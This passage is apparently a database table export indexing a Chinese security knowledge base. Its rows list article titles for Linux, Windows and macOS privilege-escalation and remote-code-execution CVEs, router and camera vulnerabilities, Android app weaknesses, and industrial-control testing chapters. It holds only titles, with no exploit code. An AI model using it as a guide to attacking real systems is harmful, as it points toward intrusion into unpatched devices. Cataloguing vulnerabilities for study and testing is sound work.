| 1091 | 系统安全  | IOS                            | {'id': 6634, 'name': 'IDA：强大的反汇编工具', 'pid': 286, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6634, 'title': None}                                                                                  |
| 1092 | 系统安全  | IOS                            | {'id': 6635, 'name': 'Hopper: 另一款反汇编工具', 'pid': 286, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6635, 'title': None}                                                                              |
| 1093 | 系统安全  | IOS                            | {'id': 6670, 'name': '搭建移动渗透测试平台', 'pid': 296, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6670, 'title': None}                                                                                    |
| 1094 | 系统安全  | IOS                            | {'id': 6669, 'name': 'GDB简介', 'pid': 296, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6669, 'title': None}                                                                                         |
| 1095 | 系统安全  | IOS                            | {'id': 6671, 'name': 'LLDB简介', 'pid': 296, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6671, 'title': None}                                                                                        |
| 1096 | 系统安全  | IOS                            | {'id': 6668, 'name': 'Clutch：iOS应用破解工具', 'pid': 296, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6668, 'title': None}                                                                              |
| 1097 | 系统安全  | Linux                          | {'id': 7030, 'name': '（CVE-2015-1328）Ubuntu Linux 内核本地提权漏洞', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7030, 'title': None}                                                          |
| 1098 | 系统安全  | Linux                          | {'id': 7031, 'name': '（CVE-2016-5195）脏牛Linux 本地提权', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7031, 'title': None}                                                                   |
| 1099 | 系统安全  | Linux                          | {'id': 6828, 'name': '（CVE-2017-7494）Linux Samba 远程代码执行', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6828, 'title': None}                                                             |
| 1100 | 系统安全  | Linux                          | {'id': 7094, 'name': '（CVE-2016-0728）Linux 本地提权漏洞', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7094, 'title': None}                                                                   |
| 1101 | 系统安全  | Linux                          | {'id': 6832, 'name': '（CVE-2017-16995）Ubuntu 内核提权', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6832, 'title': None}                                                                   |
| 1102 | 系统安全  | Linux                          | {'id': 7093, 'name': '（CVE-2018-18955）Linux 内核的提权', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7093, 'title': None}                                                                   |
| 1103 | 系统安全  | Linux                          | {'id': 6767, 'name': '（CVE-2019-13272）Linux 本地提权漏洞', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6767, 'title': None}                                                                  |
| 1104 | 系统安全  | Linux                          | {'id': 7092, 'name': '（CVE–2018-1000001）Glibc缓冲区下溢漏洞', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7092, 'title': None}                                                                |
| 1105 | 系统安全  | Linux                          | {'id': 7032, 'name': '（CVE-2019-14287）Sudo 提权漏洞', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7032, 'title': None}                                                                     |
| 1106 | 系统安全  | Linux                          | {'id': 7292, 'name': '（CVE-2020-16125）Ubuntu 提权漏洞', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7292, 'title': None}                                                                   |
| 1107 | 系统安全  | Linux                          | {'id': 7208, 'name': '（CVE-2020-27194）Linux 内核 eBPF 权限提升漏洞', 'pid': 279, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7208, 'title': None}                                                          |
| 1108 | 系统安全  | Mac                            | {'id': 7168, 'name': 'MacOS 隐私控制 bypass', 'pid': 426, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7168, 'title': None}                                                                             |
| 1109 | 系统安全  | Mac                            | {'id': 7169, 'name': 'MacOS Mojave 麦克风/摄像头 bypass', 'pid': 426, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7169, 'title': None}                                                                   |
| 1110 | 系统安全  | Mac                            | {'id': 7244, 'name': '滥用MACL绕过macOS的隐私控制', 'pid': 426, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7244, 'title': None}                                                                            |
| 1111 | 系统安全  | Mac                            | {'id': 7321, 'name': '（CVE-2020-9967）MacOS 6LowPAN内核漏洞', 'pid': 426, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7321, 'title': None}                                                              |
| 1112 | 系统安全  | Windows                        | {'id': 6612, 'name': '（CVE-2008-4250）【MS08-067】Windows 远程溢出漏洞', 'pid': 315, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6612, 'title': None}                                                       |
| 1113 | 系统安全  | Windows                        | {'id': 6613, 'name': '（CVE-2017-0143........）【MS17-010】Windows 远程溢出漏洞', 'pid': 315, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6613, 'title': None}                                               |
| 1114 | 系统安全  | Windows                        | {'id': 6643, 'name': '（CVE-2019-0708） Windows 远程溢出漏洞', 'pid': 315, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6643, 'title': None}                                                                |
| 1115 | 系统安全  | Windows                        | {'id': 6666, 'name': '（CVE\xad-2020\xad-0796） Windows 远程溢出漏洞', 'pid': 315, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6666, 'title': None}                                                        |
| 1116 | 系统安全  | Windows                        | {'id': 7284, 'name': '（CVE-2020-16898）Windows TCP/IP远程代码执行漏洞', 'pid': 315, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7284, 'title': None}                                                        |
| 1117 | 系统安全  | Windows                        | {'id': 6665, 'name': '（CVE-2016-0099）【MS16-32】 windows 本地提权漏洞', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6665, 'title': None}                                                       |
| 1118 | 系统安全  | Windows                        | {'id': 6642, 'name': '（CVE-2016-3225）【MS16-075】 JuicyPotato windows 本地提权漏洞', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6642, 'title': None}                                          |
| 1119 | 系统安全  | Windows                        | {'id': 7320, 'name': '（CVE-2018-8120）Windows 本地提权漏洞', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7320, 'title': None}                                                                 |
| 1120 | 系统安全  | Windows                        | {'id': 7040, 'name': '（CVE-2019-0803）Win32K组件提权', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7040, 'title': None}                                                                     |
| 1121 | 系统安全  | Windows                        | {'id': 7170, 'name': '（CVE-2019-0808）Windows 本地提权漏洞', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7170, 'title': None}                                                                 |
| 1122 | 系统安全  | Windows                        | {'id': 6829, 'name': '（CVE-2020-0787）Windows 本地提权漏洞', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6829, 'title': None}                                                                 |
| 1123 | 系统安全  | Windows                        | {'id': 6830, 'name': '（CVE-2020-1054）Windows 本地提权漏洞', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6830, 'title': None}                                                                 |
| 1124 | 系统安全  | Windows                        | {'id': 7097, 'name': '（CVE-2020-1472）Windows NetLogon 本地提权漏洞', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7097, 'title': None}                                                        |
| 1125 | 系统安全  | Windows                        | {'id': 7100, 'name': '（CVE-2020-10665）Windows 本地提权漏洞', 'pid': 316, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7100, 'title': None}                                                                |
| 1126 | 系统安全  | Oracle Solaris                 | {'id': 7263, 'name': '（CVE-2020-14871）Oracle Solaris 缓存溢出漏洞', 'pid': 453, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7263, 'title': None}                                                         |
| 1127 | APP安全 | Android                        | {'id': 7219, 'name': 'App安全评估中所需的软件', 'pid': 441, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7219, 'title': None}                                                                                 |
| 1128 | APP安全 | Android                        | {'id': 7220, 'name': '开启Debuggable属性，存在应用信息篡改泄露风险', 'pid': 442, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7220, 'title': None}                                                                   |
| 1129 | APP安全 | Android                        | {'id': 7221, 'name': '开启allowbackup备份权限，存在备份数据泄露风险', 'pid': 442, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7221, 'title': None}                                                                  |
| 1130 | APP安全 | Android                        | {'id': 7222, 'name': '环境搭建', 'pid': 443, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7222, 'title': None}                                                                                          |
| 1131 | APP安全 | Android                        | {'id': 7224, 'name': 'Activity组件安全', 'pid': 443, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7224, 'title': None}                                                                                  |
| 1132 | APP安全 | Android                        | {'id': 7226, 'name': 'Broadcast组件安全', 'pid': 443, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7226, 'title': None}                                                                                 |
| 1133 | APP安全 | Android                        | {'id': 7225, 'name': 'Content Provider组件安全', 'pid': 443, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7225, 'title': None}                                                                          |
| 1134 | APP安全 | Android                        | {'id': 7223, 'name': 'Service组件安全', 'pid': 443, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7223, 'title': None}                                                                                   |
| 1135 | APP安全 | Android                        | {'id': 7228, 'name': '反编译代码', 'pid': 444, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7228, 'title': None}                                                                                         |
| 1136 | APP安全 | Android                        | {'id': 7229, 'name': '二次打包', 'pid': 444, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7229, 'title': None}                                                                                          |
| 1137 | APP安全 | Android                        | {'id': 7230, 'name': '证书规范', 'pid': 444, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7230, 'title': None}                                                                                          |
| 1138 | APP安全 | Android                        | {'id': 7231, 'name': '签名机制', 'pid': 444, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7231, 'title': None}                                                                                          |
| 1139 | APP安全 | Android                        | {'id': 7232, 'name': 'WebView', 'pid': 444, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7232, 'title': None}                                                                                       |
| 1140 | APP安全 | Android                        | {'id': 7243, 'name': '钓鱼劫持', 'pid': 444, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7243, 'title': None}                                                                                          |
| 1141 | APP安全 | Android                        | {'id': 7242, 'name': '利用业务逻辑缺陷制作短信炸弹', 'pid': 444, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7242, 'title': None}                                                                                |
| 1142 | APP安全 | Android                        | {'id': 7233, 'name': '本地存储数据安全分析', 'pid': 445, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7233, 'title': None}                                                                                    |
| 1143 | APP安全 | Android                        | {'id': 7234, 'name': '操作记录检测', 'pid': 445, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7234, 'title': None}                                                                                        |
| 1144 | APP安全 | Android                        | {'id': 7236, 'name': '边信道信息泄漏', 'pid': 445, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7236, 'title': None}                                                                                       |
| 1145 | APP安全 | Android                        | {'id': 7237, 'name': '传输过程中的数据被解密', 'pid': 445, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7237, 'title': None}                                                                                   |
| 1146 | APP安全 | Android                        | {'id': 7238, 'name': '明文传输检测', 'pid': 445, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7238, 'title': None}                                                                                        |
| 1147 | APP安全 | Android                        | {'id': 7239, 'name': '鉴权机制', 'pid': 445, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7239, 'title': None}                                                                                          |
| 1148 | APP安全 | Android                        | {'id': 7240, 'name': '未使用有效的token机制，导致可以绕过鉴权', 'pid': 445, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7240, 'title': None}                                                                        |
| 1149 | APP安全 | Android                        | {'id': 7241, 'name': '登录设计缺陷，存在被暴力破解风险', 'pid': 445, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7241, 'title': None}                                                                              |
| 1150 | IOT安全 | Amazon Kindle Fire HD (3rd)    | {'id': 6162, 'name': '（CVE-2018-11019）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞', 'pid': 168, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6162, 'title': None}                              |
| 1151 | IOT安全 | Amazon Kindle Fire HD (3rd)    | {'id': 6163, 'name': '（CVE-2018-11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞', 'pid': 168, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6163, 'title': None}                              |
| 1152 | IOT安全 | Amazon Kindle Fire HD (3rd)    | {'id': 6164, 'name': '（CVE-2018-11021）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞', 'pid': 168, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6164, 'title': None}                              |
| 1153 | IOT安全 | Amazon Kindle Fire HD (3rd)    | {'id': 6165, 'name': '（CVE-2018-11022）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞', 'pid': 168, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6165, 'title': None}                              |
| 1154 | IOT安全 | Amazon Kindle Fire HD (3rd)    | {'id': 6166, 'name': '（CVE-2018-11023）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞', 'pid': 168, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6166, 'title': None}                              |
| 1155 | IOT安全 | Amazon Kindle Fire HD (3rd)    | {'id': 6167, 'name': '（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞', 'pid': 168, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6167, 'title': None}                              |
| 1156 | IOT安全 | Amazon Kindle Fire HD (3rd)    | {'id': 6168, 'name': '（CVE-2018-11025）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞', 'pid': 168, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6168, 'title': None}                              |
| 1157 | IOT安全 | Cisco                          | {'id': 6169, 'name': '（CVE-2019-1663）Cisco 堆栈缓冲区溢出漏洞', 'pid': 169, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6169, 'title': None}                                                                |
| 1158 | IOT安全 | Cisco                          | {'id': 7021, 'name': '（CVE-2020-3452）Cisco ASA/FTD 任意文件读取漏洞', 'pid': 169, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7021, 'title': None}                                                         |
| 1159 | IOT安全 | D-Link                         | {'id': 6170, 'name': '（CVE-2018-19986）D-Link DIR-818LW&828命令注入漏洞', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6170, 'title': None}                                                    |
| 1160 | IOT安全 | D-Link                         | {'id': 6171, 'name': '（CVE-2018-20056）D-Link DIR-619L&605L 栈溢出漏洞', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6171, 'title': None}                                                    |
| 1161 | IOT安全 | D-Link                         | {'id': 6172, 'name': '（CVE-2018-20057）D-Link DIR-619L&605L 命令注入漏洞', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6172, 'title': None}                                                   |
| 1162 | IOT安全 | D-Link                         | {'id': 6173, 'name': '（CVE-2019-7297）D-Link DIR-823G 命令注入漏洞', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6173, 'title': None}                                                         |
| 1163 | IOT安全 | D-Link                         | {'id': 6174, 'name': '（CVE-2019-7298）D-Link DIR-823G 命令注入漏洞', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6174, 'title': None}                                                         |
| 1164 | IOT安全 | D-Link                         | {'id': 6175, 'name': '（CVE-2019-13128）D-Link DIR-823G命令注入漏洞', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6175, 'title': None}                                                         |
| 1165 | IOT安全 | D-Link                         | {'id': 6176, 'name': '（CVE-2019-15529）D-Link DIR-823G', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6176, 'title': None}                                                               |
| 1166 | IOT安全 | D-Link                         | {'id': 6177, 'name': '（CVE-2019-16920）D-Link rce', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6177, 'title': None}                                                                    |
| 1167 | IOT安全 | D-Link                         | {'id': 6178, 'name': '（CVE-2019–17621）D-Link DIR-859 rce', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6178, 'title': None}                                                            |
| 1168 | IOT安全 | D-Link                         | {'id': 6179, 'name': '（CVE-2019–20213）D-Link DIR-859 rce', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6179, 'title': None}                                                            |
| 1169 | IOT安全 | D-Link                         | {'id': 7405, 'name': '（CNVD-2018-01084）D-Link service.cgi 远程命令执行漏洞', 'pid': 170, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7405, 'title': None}                                                  |
| 1170 | IOT安全 | Draytek                        | {'id': 7262, 'name': '（CVE-2020-8515）Draytek 企业级路由器 远程命令执行漏洞', 'pid': 452, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7262, 'title': None}                                                        |
| 1171 | IOT安全 | Draytek                        | {'id': 7399, 'name': '（CVE-2020-14472）DrayTek Vigor2960 远程代码执行漏洞', 'pid': 452, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7399, 'title': None}                                                    |
| 1172 | IOT安全 | Hikvision                      | {'id': 7026, 'name': '（CVE-2017-7921）Hikvision IP Camera Access Bypass', 'pid': 373, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7026, 'title': None}                                              |
| 1173 | IOT安全 | Hisilicon                      | {'id': 7107, 'name': '（CVE-2020-24214）Hisilicon Buffer overflow: definite DoS and potential RCE', 'pid': 399, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7107, 'title': None}                     |
| 1174 | IOT安全 | Hisilicon                      | {'id': 7103, 'name': '（CVE-2020-24215）HiSilicon Backdoor password', 'pid': 399, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7103, 'title': None}                                                   |
| 1175 | IOT安全 | Hisilicon                      | {'id': 7108, 'name': '（CVE-2020-24216）Hisilicon RTSP 未授权访问', 'pid': 399, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7108, 'title': None}                                                          |
| 1176 | IOT安全 | Hisilicon                      | {'id': 7106, 'name': '（CVE-2020-24217）Hisilicon 任意文件上传漏洞', 'pid': 399, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7106, 'title': None}                                                            |
| 1177 | IOT安全 | Hisilicon                      | {'id': 7104, 'name': '（CVE-2020-24218）Hisilicon root access via telnet', 'pid': 399, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7104, 'title': None}                                              |
| 1178 | IOT安全 | Hisilicon                      | {'id': 7105, 'name': '（CVE-2020-24219）Hisilicon 任意文件读取漏洞', 'pid': 399, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7105, 'title': None}                                                            |
| 1179 | IOT安全 | Huawei                         | {'id': 6180, 'name': '（CVE-2016-6158）华为WS331a产品管理页面存在CSRF漏洞', 'pid': 171, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6180, 'title': None}                                                         |
| 1180 | IOT安全 | JCG                            | {'id': 6181, 'name': 'JCG路由器命令执行漏洞', 'pid': 172, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6181, 'title': None}                                                                                  |
| 1181 | IOT安全 | PHICOMM                        | {'id': 6182, 'name': '（CVE-2019-19117）PHICOMM 远程代码执行', 'pid': 173, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6182, 'title': None}                                                                |
| 1182 | IOT安全 | Sapido                         | {'id': 6183, 'name': 'Sapido多款路由器命令执行漏洞&突破', 'pid': 174, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6183, 'title': None}                                                                          |
| 1183 | IOT安全 | TP-Link                        | {'id': 6184, 'name': '（CVE-2017-16957）TP-Link 命令注入漏洞', 'pid': 175, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6184, 'title': None}                                                                |
| 1184 | IOT安全 | TP-Link                        | {'id': 6185, 'name': '（CVE-2020-9374）TP-Link TL-WR849N 远程命令执行漏洞', 'pid': 175, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6185, 'title': None}                                                     |
| 1185 | IOT安全 | ZTE                            | {'id': 7059, 'name': '（CVE-2020-6871）ZTE R5300G4、R8500G4和R5500G4 未授权访问漏洞', 'pid': 384, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7059, 'title': None}                                            |
| 1186 | IOT安全 | 360                            | {'id': 6186, 'name': '360 Phone N6 Pro内核漏洞', 'pid': 176, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6186, 'title': None}                                                                          |
| 1187 | IOT安全 | 三星                             | {'id': 6187, 'name': '（CVE-2017-14262）Samsung NVR devices 漏洞', 'pid': 177, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6187, 'title': None}                                                        |
| 1188 | IOT安全 | 三星                             | {'id': 7390, 'name': '三星路由器 WLAN AP WEA453e 默认凭据漏洞', 'pid': 177, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7390, 'title': None}                                                                  |
| 1189 | IOT安全 | 三星                             | {'id': 7391, 'name': '三星路由器 WLAN AP WEA453e 任意文件读取漏洞', 'pid': 177, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7391, 'title': None}                                                                |
| 1190 | IOT安全 | 三星                             | {'id': 7392, 'name': '三星路由器 WLAN AP WEA453e 远程命令执行漏洞', 'pid': 177, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7392, 'title': None}                                                                |
| 1191 | IOT安全 | 三星                             | {'id': 7393, 'name': '三星路由器 WLAN AP WEA453e XSS漏洞', 'pid': 177, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7393, 'title': None}                                                                   |
| 1192 | IOT安全 | 飞鱼星                            | {'id': 7316, 'name': '飞鱼星 上网行为管理路由器未授权访问导致的配置信息泄漏', 'pid': 475, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7316, 'title': None}                                                                   |
| 1193 | IOT安全 | 小米                             | {'id': 6188, 'name': '（CVE-2019-18370）Xiaomi Mi WiFi R3G 远程命令执行漏洞', 'pid': 178, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6188, 'title': None}                                                   |
| 1194 | IOT安全 | 小米                             | {'id': 6189, 'name': '（CVE-2019-18371） Xiaomi Mi WiFi R3G 任意文件读取漏洞', 'pid': 178, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6189, 'title': None}                                                  |
| 1195 | IOT安全 | 小米                             | {'id': 7367, 'name': '（CNVD-2020-58411）Misstar Tools 小米路由器 未授权访问漏洞', 'pid': 178, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7367, 'title': None}                                                  |
| 1196 | IOT安全 | 中移禹路由                          | {'id': 7343, 'name': '（CNVD-2020-55983）中移禹路由 未授权访问漏洞', 'pid': 483, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7343, 'title': None}                                                                |
| 1197 | IOT安全 | 火狐浏览器                          | {'id': 7115, 'name': 'Firefox安卓手机浏览器恶意跳转', 'pid': 404, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7115, 'title': None}                                                                            |
| 1198 | IOT安全 | 默认设备密码                         | {'id': 6161, 'name': '默认设备密码', 'pid': 167, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6161, 'title': None}                                                                                        |
| 1199 | 工控安全  | 工控系统安全测试用例                     | {'id': 6808, 'name': '0.1 前言', 'pid': 325, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6808, 'title': None}                                                                                        |
| 1200 | 工控安全  | 工控系统安全测试用例                     | {'id': 6809, 'name': '0.2 工控系统的概念', 'pid': 325, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6809, 'title': None}                                                                                   |
| 1201 | 工控安全  | 工控系统安全测试用例                     | {'id': 6810, 'name': '0.3 工业控制网络与传统IT网络的不同', 'pid': 325, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6810, 'title': None}                                                                          |
| 1202 | 工控安全  | 工控系统安全测试用例                     | {'id': 6811, 'name': '0.4 工控系统网络安全特点', 'pid': 325, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6811, 'title': None}                                                                                |
| 1203 | 工控安全  | 工控系统安全测试用例                     | {'id': 6779, 'name': '0.5 致谢 && 参考链接', 'pid': 325, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6779, 'title': None}                                                                                |
| 1204 | 工控安全  | 工控系统安全测试用例                     | {'id': 6778, 'name': '1.0 工控设备检测概述', 'pid': 323, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6778, 'title': None}                                                                                  |
| 1205 | 工控安全  | 工控系统安全测试用例                     | {'id': 6780, 'name': '1.1 SCADA系统', 'pid': 323, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6780, 'title': None}                                                                                   |
| 1206 | 工控安全  | 工控系统安全测试用例                     | {'id': 6781, 'name': '1.2 上位机系统', 'pid': 323, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6781, 'title': None}                                                                                     |
| 1207 | 工控安全  | 工控系统安全测试用例                     | {'id': 6782, 'name': '1.3 下位机系统', 'pid': 323, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6782, 'title': None}                                                                                     |
| 1208 | 工控安全  | 工控系统安全测试用例                     | {'id': 6783, 'name': '1.4 应用服务器安全测试', 'pid': 323, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6783, 'title': None}                                                                                 |
| 1209 | 工控安全  | 工控系统安全测试用例                     | {'id': 6784, 'name': '1.5 工控设备安全测试工具列表', 'pid': 323, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6784, 'title': None}                                                                              |
| 1210 | 工控安全  | 工控系统安全测试用例                     | {'id': 6785, 'name': '2.1 Modbus协议会话过程', 'pid': 326, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6785, 'title': None}                                                                              |
| 1211 | 工控安全  | 工控系统安全测试用例                     | {'id': 6786, 'name': '2.2 Modbus协议会话机制中的漏洞', 'pid': 326, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6786, 'title': None}                                                                          |
| 1212 | 工控安全  | 工控系统安全测试用例                     | {'id': 6787, 'name': '2.3 Modbus协议漏洞挖掘方法', 'pid': 326, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6787, 'title': None}                                                                            |
| 1213 | 工控安全  | 工控系统安全测试用例                     | {'id': 6788, 'name': '3.1 国际标准', 'pid': 328, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6788, 'title': None}                                                                                      |
| 1214 | 工控安全  | 工控系统安全测试用例                     | {'id': 6789, 'name': '3.2 国家标准', 'pid': 328, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6789, 'title': None}                                                                                      |
| 1215 | 工控安全  | 工控系统安全测试用例                     | {'id': 6790, 'name': '3.3 电力行业标准', 'pid': 328, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6790, 'title': None}                                                                                    |
| 1216 | 工控安全  | 工控系统安全测试用例                     | {'id': 6791, 'name': '3.4 石化行业标准', 'pid': 328, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6791, 'title': None}                                                                                    |
| 1217 | 工控安全  | 工控系统安全测试用例                     | {'id': 6792, 'name': '3.5 核电行业标准', 'pid': 328, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6792, 'title': None}                                                                                    |
| 1218 | 工控安全  | 工控系统安全测试用例                     | {'id': 6793, 'name': '3.6 烟草行业标准', 'pid': 328, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6793, 'title': None}                                                                                    |
| 1219 | 工控安全  | 工控系统安全测试用例                     | {'id': 6796, 'name': '4.1.1 工业控制系统的概念和定义', 'pid': 330, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6796, 'title': None}                                                                            |
| 1220 | 工控安全  | 工控系统安全测试用例                     | {'id': 6797, 'name': '4.1.2 工业控制系统分层模型', 'pid': 330, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6797, 'title': None}                                                                              |
| 1221 | 工控安全  | 工控系统安全测试用例                     | {'id': 6794, 'name': '4.2 等保2.0工控安全基本要求', 'pid': 329, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6794, 'title': None}                                                                             |
| 1222 | 工控安全  | 工控系统安全测试用例                     | {'id': 6795, 'name': '4.3 等保2.0工业控制系统安全扩展要求', 'pid': 329, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6795, 'title': None}                                                                         |
| 1223 | 工控安全  | 工控系统安全测试用例                     | {'id': 6798, 'name': '5.1.1 电力行业 业务介绍', 'pid': 332, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6798, 'title': None}                                                                               |
| 1224 | 工控安全  | 工控系统安全测试用例                     | {'id': 6799, 'name': '5.1.2 电力行业 工控系统介绍', 'pid': 332, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6799, 'title': None}                                                                             |
